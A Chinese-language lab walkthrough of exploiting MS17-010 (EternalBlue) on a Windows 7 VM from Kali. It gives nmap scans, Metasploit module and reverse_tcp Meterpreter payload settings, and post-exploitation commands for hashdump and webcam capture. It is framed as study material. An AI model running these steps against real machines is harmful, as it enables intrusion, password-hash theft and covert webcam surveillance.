实战:MS17-010(永恒之蓝)漏洞测试实战
背景:2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。 恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制等恶意程序。
使用软件:Vmware Workstation 17
使用机:Kali
靶机环境:Win7
复现步骤:
步骤1:查看受害者的机器是否存活 nmap (同一网段IP地址)(1/24)可加可不加 (使用机与靶机注要保持同一网段 使用NAT,看相互是否ping通)
全面扫描 nmap -T4 -A -v -Pn (IP地址) 1/24
步骤2:启动msf(metasploit) 命令为msfconsole
步骤3 搜索漏洞 命令为:search ms17-010
查看必备参数是否填写完。
看到 RHOSTS(目标)空缺 设置目标并且看是否有MS17-010目标
步骤4 使用序号为1的模块
命令:use 0
看到 RHOSTS(目标)空缺
步骤5 查看设置负载
因为 看到提示 no payload 所以要设置负载
查看 设置负载
命令:set payload windows/x64/meterpreter/reverse_tcp
步骤6 设置靶机IP
命令:set rhost
步骤7 设置使用机IP
命令:set lhost
输入run 结果会显示WIN,表示拿到权限
发现会存在一定乱码,是编码的问题
使用命令chcp 65001 补充: 936 =GBK(显示中文用的) 437=MS-DOS的默认字符集 65001=UTF-8
步骤8 屏幕快照 上传到C盘
看到快照了 从目标机中下载文件
其他部分:
查看拿到的权限,为管理员
命令 getuid——
hashdump获取密码md5码
其他命令:
webcam_list ——查看摄像头
webcam_snap——通过摄像头拍照
webcam_stream——通过摄像头开启视频
注:本文内容仅为学习分享,谨记网络安全法规,维护国家网络安全。